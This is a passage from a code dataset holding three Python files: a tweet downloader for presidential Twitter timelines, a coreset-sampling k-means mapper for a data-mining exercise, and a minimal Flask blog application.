Cursor(self.twitter_client.user_timeline, id=self.twitter_user, tweet_mode='extended').items():\r\n if (not tweet.retweeted) and ('RT' not in tweet.full_text) and (tweet.created_at < endDate) and (tweet.created_at > startDate):\r\n tweets.append(tweet)\r\n return tweets\r\n\r\nclass TweetAnalyzer():\r\n \"\"\"\r\n Functionality for analyzing and categorizing content from tweets\r\n \"\"\"\r\n def clean_text(self, text):\r\n a = text\r\n b = \",.!?;'\"\r\n c = \"&\"\r\n\r\n for char in b:\r\n if char==c:\r\n a = a.replace(char,\"and\")\r\n else:\r\n a = a.replace(char,\"\")\r\n return a\r\n\r\n def tweets_to_data_frame(self, tweets):\r\n df = pd.DataFrame(data=[tweet.full_text for tweet in tweets], columns=['text'])\r\n\r\n df['date'] = np.array([tweet.created_at for tweet in tweets])\r\n df['id'] = np.array([tweet.id_str for tweet in tweets])\r\n df['retweets'] = np.array([tweet.retweet_count for tweet in tweets])\r\n df['favorites'] = np.array([tweet.favorite_count for tweet in tweets])\r\n\r\n return df\r\n\r\ntweet_analyzer = TweetAnalyzer()\r\n\r\n##### Donald Trump #####\r\n# startDate = datetime.datetime(2017, 1, 20, 0, 0 ,0)\r\n# endDate = datetime.datetime(2021, 1, 1, 0, 0 ,0)\r\n# twitter_client = TwitterClient(twitter_user='POTUS')\r\n# tweets = twitter_client.get_user_timeline_tweets(startDate)\r\n# for tweet in tweets:\r\n# tweet.full_text = tweet_analyzer.clean_text(tweet.full_text)\r\n# tweets_df = tweet_analyzer.tweets_to_data_frame(tweets)\r\n# tweets_df.to_csv('potus.csv', sep='\\t', encoding='utf-8', index=False)\r\n##### Donald Trump #####\r\n\r\n##### Barack Obama #####\r\nstartDate = datetime.datetime(2009, 1, 20, 0, 0 ,0)\r\nendDate = datetime.datetime(2017, 1, 20, 0, 0 ,0)\r\ntwitter_client = TwitterClient(twitter_user='BarackObama')\r\ntweets = twitter_client.get_user_timeline_tweets(startDate,endDate)\r\nfor tweet in tweets:\r\n tweet.full_text = tweet_analyzer.clean_text(tweet.full_text)\r\ntweets_df = tweet_analyzer.tweets_to_data_frame(tweets)\r\ntweets_df.to_csv('obama.csv', sep='\\t', encoding='utf-8', index=False)\r\n##### Barack Obama #####\r\n","sub_path":"download_tweets.py","file_name":"download_tweets.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"282963329","text":"#!/usr/bin/env python2.7\nimport logging\n\nimport sys\nimport math\nimport numpy as np\nimport scipy\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.metrics import euclidean_distances\nimport datetime\n#import good_data\n\n# 40'000: Submission 2952, score: 740.608811745 => 12 minutes\n# 55'000: Submission: 2953, score: 739.711630341 => 20 minutes\n# 65'000: Submission: 2954, score: 739.300944969 => 20 minutes\n# 65'000: Submission: 2957, score: 739.690196805 => 15 minutes, magic * 2\n# 65'000: Submission: 2958, score: 738.644914845 => 19 minutes, magic / 2\n# 75'000: Submission: 2955, score: 738.478742513 => 19 minutes\n# 85'000: Submission: 2956, score: FAILED => FAILED\n# 95'000: Submission: 2959, score: FAILED => FAILED\n#100'000: Submission: 2960, score: FAILED => FAILED\n# 80'000: Submission: 2961, score: 738.669749628 => 25 minutes\n# Submission 3609\n\n\nclass Helper:\n def __init__(self):\n pass\n\n @staticmethod\n def dist_func(center, point):\n return np.float128(euclidean_distances(center, point, squared=True))\n\n\nclass ClusterCenter():\n def __init__(self, center):\n self.center = center\n self.points = []\n self.dist_sum = None\n\n def add_point(self, point):\n self.points.append(point)\n self.dist_sum = None\n\n def dist_point_sum(self):\n if self.dist_sum is None:\n self.dist_sum = np.float128(0.0)\n for point in self:\n self.dist_sum += Helper.dist_func(self.center, point)\n return self.dist_sum\n\n def __len__(self):\n return len(self.points)\n\n def __getitem__(self, item):\n return self.points[item]\n\n def get_half_farthest_points(self):\n dist_points = [[Helper.dist_func(self.center, p), p] for p in self.points]\n sorted_dist_points = sorted(dist_points, key=lambda dist_point: dist_point[0])\n to_keep = len(self.points) / 2\n return [dist_point[1] for dist_point in sorted_dist_points][0:to_keep]\n\n\nclass DataPoint():\n def __init__(self, point, cluster):\n self.point = point\n self.cluster = cluster\n self.cluster.add_point(point)\n self.q = None\n self.dp_sum = None\n\n def calc_sampling_weight(self):\n if self.q is None:\n # Formula slide 33, dm-09\n center_dist_ratio = np.float128(1.0)\n if Helper.dist_func(self.cluster.center, self.point) != np.float128(0.0):\n center_dist_ratio = Helper.dist_func(self.cluster.center, self.point) / self.cluster.dist_point_sum()\n\n self.q = np.ceil((\n (np.float128(5.0) / np.float128(len(self.cluster))) +\n center_dist_ratio\n ) * np.float128(3.0)) - np.float128(2.0)\n return self.q\n\n def calc_sampling_probability(self):\n return self.calc_sampling_weight() / self.dp_sum\n\n def calc_weight(self, out_per_mapper):\n return 1.0 / self.calc_sampling_weight() / out_per_mapper\n\n\nclass Mapper:\n def __init__(self):\n total_rows_in_reducer, mappers = [8000, 15] if \"--local\" in sys.argv else [75000, 300]\n\n self.no_clusters = 200\n self.out_per_mapper = total_rows_in_reducer / mappers\n self.written = 0\n\n self.num_per_mapper = 6667\n self.avg_cluster_size = None\n self.keep_ratio = None\n\n self.cluster_centers = None\n self.cluster_center_points = None\n self.data_points = None\n\n def run(self):\n self.data = self.read_input()\n\n self.num_per_mapper = len(self.data)\n self.avg_cluster_size = np.float128(self.num_per_mapper) / np.float128(self.no_clusters)\n self.keep_ratio = np.float128(self.out_per_mapper) / np.float128(self.num_per_mapper)\n\n np.random.shuffle(self.data)\n self.cluster_center_points = self.build_coresets()\n self.cluster_centers = [ClusterCenter(c) for c in self.cluster_center_points]\n self.sample_points()\n #logging.warn(\"Written %i\" % self.written)\n #logging.warn(self.out_per_mapper)\n\n def read_input(self):\n reader = sys.stdin\n\n if \"--read_from_file\" in sys.argv:\n index = int(sys.argv[1])\n\n return np.load(\"../../../1-data/training.npz\")['arr_0'][\n ((index - 1) * self.num_per_mapper):(index * self.num_per_mapper)]\n\n arr = []\n for line in reader:\n arr.append(np.fromstring(line, dtype=np.float128, sep=' '))\n\n return np.array(arr)\n\n def write_feature(self, row, weight):\n def precise_str(x):\n return \"%.25f\" % x\n\n print(\"1\\t%f\\t%s\" % (weight, \" \".join(map(precise_str, row))))\n self.written += 1\n\n def can_write_more_features(self):\n return self.written < self.out_per_mapper\n\n def cluster_center(self, cluster_index):\n return self.cluster_centers[cluster_index]\n\n def build_coresets(self):\n # The number of elements to take into the coreset at each iteration\n # should be 10 * d * k * ln(1/epsilon) = 10 * 750 * 200 * ln(1/0.1) = HUGE!?\n # Hmm...\n # From: http://www.mit.edu/~michaf/Code/SVDCoresetAlg.m: \"Should be equal to k / epsilon^2\"\n # k / epsilon^2\n # for epsilon = 0.99: 200/(0.99)^2 = 205\n # for epsilon = 0.5: 200/(0.5)^2 = 800\n # for epsilon = 0.4: 200/(0.4)^2 = 1250\n # for epsilon = 0.3: 200/(0.3)^2 = 2223\n # for epsilon = 0.2: 200/(0.2)^2 = 5000\n # for epsilon = 0.1: 200/(0.1)^2 = 20000\n # for epsilon = 0.05: 200/(0.05)^2 = 80000\n # => to have at most 60'000 dp's at the reducer, chose at most 200 per mapper => gives an epsilon = 0.99??\n # => have to merge coresets at the reducer!\n # TODO: use higher value here, and merge coresets at reducer\n magic_constant = int(self.out_per_mapper / np.log2(len(self.data)) + 1)\n\n # self.data is shuffled already => it's ok to take the first n points for uniform sampling\n dat = self.data.tolist()\n coreset = []\n while len(dat) > 0:\n coreset_part = dat[0:magic_constant]\n coreset += coreset_part\n dat = np.delete(dat, range(0, min(magic_constant, len(dat))), axis=0)\n dat = self.remove_half_nearest_points(coreset_part, dat)\n return coreset\n\n def sample_points(self):\n k = KMeans(n_clusters=self.no_clusters)\n k.cluster_centers_ = np.array(self.cluster_center_points)\n assigned_clusters = k.predict(np.array(self.data))\n\n self.cluster_centers = [ClusterCenter(c) for c in self.cluster_center_points]\n self.data_points = [DataPoint(self.data[i], self.cluster_centers[assigned_clusters[i]]) for i in\n range(len(self.data))]\n\n dp_sum = np.sum([dp.calc_sampling_weight() for dp in self.data_points]) / self.out_per_mapper\n\n for dp in self.data_points:\n dp.dp_sum = dp_sum\n\n #logging.warn(\"Tot!\")\n #logging.warn(sum([dp.calc_sampling_probability() for dp in self.data_points]))\n #logging.error(len(self.data_points))\n\n while self.can_write_more_features():\n np.random.shuffle(self.data_points)\n for dp in self.data_points:\n if not self.can_write_more_features():\n return\n\n dp.dp_sum = dp_sum\n if np.random.sample() < dp.calc_sampling_probability():\n self.write_feature(dp.point, dp.calc_weight(self.out_per_mapper))\n\n def remove_half_nearest_points(self, center_points, data):\n k = KMeans(n_clusters=self.no_clusters)\n k.cluster_centers_ = np.array(center_points)\n assigned_clusters = k.predict(np.array(data))\n clusters = [ClusterCenter(c) for c in center_points]\n for i in range(0, len(assigned_clusters)):\n clusters[assigned_clusters[i]].add_point(data[i])\n\n ret = []\n for c in clusters:\n ret += c.get_half_farthest_points()\n return ret\n\n\nif __name__ == \"__main__\":\n m = Mapper()\n m.run()\n\n\n\n\n","sub_path":"gold-digger/kmeans/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"465944553","text":"from flask import Flask, redirect, render_template, url_for\nfrom models.base import init_db, create_db\nfrom routes.user import main as routes_user\nfrom routes.article import main as routes_blog\nfrom routes.api import main as routes_api\n\napp = Flask(__name__)\n\n\ndef register_routes(app):\n \"\"\"\n 在这个函数里面 import 并注册蓝图\n \"\"\"\n app.register_blueprint(routes_user, url_prefix='/user')\n app.register_blueprint(routes_blog, url_prefix='/article')\n app.register_blueprint(routes_api, url_prefix='/api')\n\n\ndef configured_app():\n # 注册路由\n register_routes(app)\n # 返回配置好的 app 实例\n return app\n\n\n@app.route('/')\ndef hello_world():\n return redirect(url_for('.articles'))\n\n\n@app.route('/articles', methods=['GET'])\ndef articles():\n return render_template('article/index.html')\n\n\nif __name__ == '__main__':\n init_db()\n app = configured_app()\n config = dict(\n debug=True,\n host='',\n port=5000\n )\n app.run(**config)\n","sub_path":"blog-flask.py","file_name":"blog-flask.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}